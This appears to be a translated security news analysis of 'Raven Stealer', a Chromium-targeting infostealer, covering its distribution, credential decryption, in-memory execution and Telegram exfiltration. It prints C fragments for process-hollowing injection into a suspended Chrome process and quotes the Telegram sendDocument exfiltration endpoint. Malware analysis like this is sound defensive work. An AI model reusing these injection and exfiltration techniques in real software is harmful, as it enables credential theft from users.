“乌鸦窃取者”已成为一种强大的信息窃取威胁,主要针对基于Chromium的浏览器用户,尤其是谷歌浏览器用户。
这种轻型恶意软件于2025年年中首次被发现,其特点是采用模块化架构和隐蔽设计,能够在不引起受害者警觉的情况下窃取敏感信息。
Raven Stealer主要通过破解软件包和地下论坛传播,它利用社会工程学策略和重新打包的安装程序来说服用户执行其恶意负载。
一旦在宿主系统上释放,“乌鸦窃取者”便会开始探查与Chrome、Edge、Brave及类似浏览器相关的本地存储路径,以定位加密密钥和凭证库。
然后,它利用原生Windows API调用解密并提取保存的密码、Cookie、自动填充条目和支付数据。在这一阶段,该恶意软件通过直接从其资源部分执行有效载荷模块(使用ChaCha20加密)来避免将任何组件写入磁盘。
这种内存中执行策略使Raven Stealer能够规避基于特征的检测和磁盘监控防御措施。
怀尔德角分析师发现,资源嵌入技术简化了部署流程,但由于配置数据和模块是在运行时动态检索的,这也使法医分析变得复杂。
在初步获取凭据后,Raven Stealer会将窃取的信息整理成纯文本文件,存储在用户的AppData目录下一个名为“RavenStealer”的文件夹中。
由此产生的文件——cookies.txt、passwords.txt和payments.txt——随后会被准备好用于数据窃取。
数据传输通过Telegram的Bot API进行:Raven Stealer会将用户提供的机器人令牌和聊天ID嵌入其有效载荷中,这些信息是它从自身的资源配置中获取的。
这种集成方式为攻击者提供了一个熟悉的命令与控制渠道,同时绕过了许多企业网络过滤器。
尽管依赖于Telegram,这种恶意软件仍能通过在每次生成有效载荷时促使构建器界面接受新凭据,来保持对令牌过期的抵御能力。
感染机制深入解析
“乌鸦窃取者”的感染机制依靠反射式进程掏空,将其主要DLL有效载荷注入到一个挂起的Chrome进程中。
执行后,恶意软件会定位Chrome二进制文件路径,并以挂起状态启动一个新实例:
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcessA(chromePath, NULL, NULL, NULL, FALSE,
CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
LPVOID remoteBuffer = VirtualAllocEx(pi.hProcess, NULL,
payloadSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, remoteBuffer,
encryptedPayload, payloadSize, NULL);Point Wild的分析师指出,该有效载荷在执行前会在内存中使用ChaCha20解密来重构DLL。
将解密后的有效载荷写入分配的内存后,恶意软件会调整线程上下文以指向远程缓冲区并恢复线程:
DWORD oldProtect;
VirtualProtectEx(pi.hProcess, remoteBuffer,
payloadSize, PAGE_EXECUTE_READ, &oldProtect);
SetThreadContext(pi.hThread, &modifiedContext);
ResumeThread(pi.hThread);这种方法将恶意活动伪装成合法的Chrome进程,从而降低被检测到的可能性。
一旦注入,该DLL会枚举浏览器配置文件,使用在Chrome的Local State文件中找到的AES密钥解密存储的凭据,并将明文数据写入磁盘。
最后,编译后的归档文件RavenStealer.zip通过端点https://api.telegram.org/bot<token>/sendDocument被发送至攻击者的Telegram频道。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
